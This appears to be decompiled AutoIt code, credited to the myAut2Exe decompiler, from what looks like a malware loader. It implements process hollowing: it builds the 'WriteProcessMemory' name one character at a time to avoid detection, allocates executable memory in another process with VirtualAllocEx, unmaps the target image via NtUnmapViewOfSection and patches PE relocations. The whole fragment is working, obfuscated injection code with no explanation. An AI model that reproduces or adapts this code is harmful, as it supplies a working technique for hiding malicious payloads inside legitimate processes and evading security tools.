RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
ENDFUNC
FUNC _6H()
LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
FOR $2Z IN $2X
$2Y&=$2Z
NEXT
RETURN $2Y
ENDFUNC
FUNC _6I($2N,$30,$31,$32,$33)
LOCAL $34=$31-$32
LOCAL $35=DLLSTRUCTGETSIZE($30)
LOCAL $36=DLLSTRUCTGETPTR($30)
LOCAL $37,$38
LOCAL $2S,$39,$3A
LOCAL $3B,$3C,$3D
LOCAL $12=3+7*$33
WHILE $38<$35
$37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
$2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
$39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
$3A=($39-8)/2
$3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
FOR $2V=1 TO $3A
$3C=DLLSTRUCTGETDATA($3B,1,$2V)
IF BITSHIFT($3C,12)=$12 THEN
$3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
ENDIF
NEXT
$38+=$39
WEND
RETURN 1
ENDFUNC
FUNC _6J($1X,$3E,$35)
LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
IF @ERROR OR NOT $1W[0]THEN
$1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
ENDIF
RETURN $1W[0]
ENDFUNC
FUNC _6K($1X,$35)
LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword",12288,"dword",64)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
RETURN $1W[0]
ENDFUNC
FUNC _6L($1X,$3E)
DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
IF @ERROR THEN RETURN SETERROR(1,0,0)
RETURN 1
ENDFUNC
FUNC _6M($1X)
LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
RETURN $1W[2]
ENDFUNC
; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)